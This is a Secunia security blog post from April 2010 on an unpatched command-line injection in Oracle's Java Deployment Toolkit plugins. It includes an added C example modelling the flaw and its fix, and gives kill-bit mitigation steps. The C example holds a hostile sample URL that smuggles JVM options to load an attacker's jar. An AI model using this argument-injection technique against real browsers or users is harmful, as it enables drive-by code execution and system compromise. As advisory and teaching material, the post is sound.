
Oracle Java Critical Vulnerability Affects Most Users

13:56 CET on the 12th April 2010
Entry written by Alin Rad Pop.

The JRE (Java Runtime Environment) update released by Oracle at the end of March covered 20 vulnerabilities, some of which were rated "Highly critical" by Secunia. You may have felt that your system was more secure after applying that update, but few users probably expected another "Highly critical" vulnerability to become public so soon after.

Today, Secunia issued SA39260. This advisory covers a vulnerability in a number of browser plugins installed by default with the JRE, commonly termed the Java Deployment Toolkit. The vulnerability was independently reported by Tavis Ormandy and Ruben Santamarta, both of whom provide good descriptions of the problem. In short, the Java Deployment Toolkit takes the URL it is asked to launch, places it on the javaws.exe command line and issues a call to CreateProcessA() without sanitising the command line arguments. Whitespace inside that string becomes additional arguments, so a web page can inject arbitrary JVM arguments and execute code outside the Java sandbox with the privileges of the user running the browser, leading to a complete system compromise from a single visit to a web site.
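The injection described above, modelled as an added C example (this is not code from the Secunia post, the Java Deployment Toolkit or Oracle): an untrusted launch URL is appended to a javaws.exe command line the way a vulnerable builder would before handing it to CreateProcessA(), a simplified argument splitter shows the extra arguments javaws.exe would receive, and a validating builder shows the fix. The javaws.exe path, the -J-jar payload string and the sample URLs are constructed assumptions, and the splitter is deliberately simpler than the real Windows argument-parsing rules; no process is actually created, so the block compiles and runs on any platform.

```c
/* Added example, not code from the Secunia post or the Java Deployment Toolkit.
 * Models an untrusted launch URL being appended to a javaws.exe command line
 * without validation, and a hardened builder that rejects such input.
 * The javaws.exe path, the sample URLs and the -J-jar payload are assumptions. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Assumed Java Web Start location; the real toolkit reads it from the registry. */
#define JAVAWS_PATH "C:\\Program Files\\Java\\jre6\\bin\\javaws.exe"

/* Vulnerable pattern: the caller-supplied URL is concatenated verbatim, so any
 * whitespace in it becomes extra javaws.exe arguments once the string is
 * passed to CreateProcessA(). Returns 0 on success, -1 if the line did not fit. */
int build_cmdline_vulnerable(const char *url, char *out, size_t outlen)
{
    int n = snprintf(out, outlen, "\"%s\" %s", JAVAWS_PATH, url);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* Simplified argv splitting: whitespace separates arguments, double quotes
 * group them. Windows' real rules (backslash escapes, quote merging) are more
 * involved, but this is enough to show what javaws.exe would receive. */
static int split_args(const char *cmdline, char argv[][256], int max_args)
{
    int argc = 0, inquote = 0;
    size_t len = 0;
    for (const char *p = cmdline; ; p++) {
        if (*p == '"') { inquote = !inquote; continue; }
        if (*p == '\0' || (!inquote && isspace((unsigned char)*p))) {
            if (len > 0) {
                argv[argc][len] = '\0';
                if (++argc == max_args) return argc;
                len = 0;
            }
            if (*p == '\0') return argc;
            continue;
        }
        if (len < 255) argv[argc][len++] = *p;
    }
}

/* Counts arguments that javaws.exe would forward to the JVM (-J prefix),
 * i.e. the options an attacker smuggled in through the "URL". */
int injected_jvm_option_count(const char *cmdline)
{
    char argv[16][256];
    int argc = split_args(cmdline, argv, 16), hits = 0;
    for (int i = 1; i < argc; i++)        /* argv[0] is the executable itself */
        if (strncmp(argv[i], "-J", 2) == 0) hits++;
    return hits;
}

/* How many JVM options a given "URL" smuggles through the vulnerable builder
 * (-1 if the command line did not fit the buffer). */
int jvm_options_smuggled(const char *url)
{
    char line[1024];
    if (build_cmdline_vulnerable(url, line, sizeof line) != 0) return -1;
    return injected_jvm_option_count(line);
}

/* Hardened check: accept only a single http(s) URL containing no whitespace,
 * control characters, quotes or non-ASCII bytes, and never anything that
 * could be parsed as an option. Returns 1 if the URL may be launched. */
int validate_launch_url(const char *url)
{
    if (url == NULL || url[0] == '-') return 0;
    if (strncmp(url, "http://", 7) != 0 && strncmp(url, "https://", 8) != 0) return 0;
    for (const char *p = url; *p; p++) {
        unsigned char c = (unsigned char)*p;
        if (isspace(c) || iscntrl(c) || c == '"' || c > 0x7e) return 0;
    }
    return 1;
}

/* Fixed builder: validate first, then quote the single accepted argument. */
int build_cmdline_safe(const char *url, char *out, size_t outlen)
{
    if (!validate_launch_url(url)) return -1;
    int n = snprintf(out, outlen, "\"%s\" \"%s\"", JAVAWS_PATH, url);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

int main(void)
{
    /* Constructed inputs: a benign JNLP URL and a "URL" carrying JVM options
     * that would make javaws.exe load an attacker-controlled jar. */
    const char *benign  = "http://example.com/app.jnlp";
    const char *hostile = "http://example.com -J-jar -J\\\\attacker\\payload.jar";
    char line[1024];

    build_cmdline_vulnerable(hostile, line, sizeof line);
    printf("vulnerable: %s\n  injected -J options: %d\n", line, injected_jvm_option_count(line));
    printf("safe(benign)  -> %d\n", build_cmdline_safe(benign, line, sizeof line));
    printf("safe(hostile) -> %d\n", build_cmdline_safe(hostile, line, sizeof line));
    return 0;
}
```

The point of validate_launch_url() is reject-by-default. Quoting the URL alone would stop it from splitting into several arguments, but it would still let a web page hand javaws.exe an arbitrary non-URL string, so the check restricts the input to one http(s) URL without whitespace, quotes or control characters before it is ever placed on a command line.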

This vulnerability is particularly attractive to an attacker because it is a command line injection rather than a memory corruption bug: the in-depth memory protection mechanisms of modern Windows operating systems, such as DEP (Data Execution Prevention) and ASLR (Address Space Layout Randomization), provide no mitigation whatsoever, and no exploit development is needed beyond crafting the argument string. Consequently, we expect to soon see attempts to exploit this vulnerability in the wild.

We hope that Oracle decides to provide an update soon. Meanwhile, Java users are recommended to delete or restrict access to all deployment plugins and to set the kill-bit for the affected ActiveX controls, i.e. to set the "Compatibility Flags" DWORD value to 0x400 under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID} for each affected control's CLSID. Note that the kill-bit only prevents Internet Explorer from instantiating the control; the equivalent Deployment Toolkit plugin for Firefox and other NPAPI browsers has to be disabled or removed separately.

Stay Secure,

Alin Rad Pop,
Senior Security Specialist

© 2002-2014 Secunia ApS - Rued Langgaards Vej 8, 4th floor, DK-2300 Copenhagen, Denmark - +45 7020 5144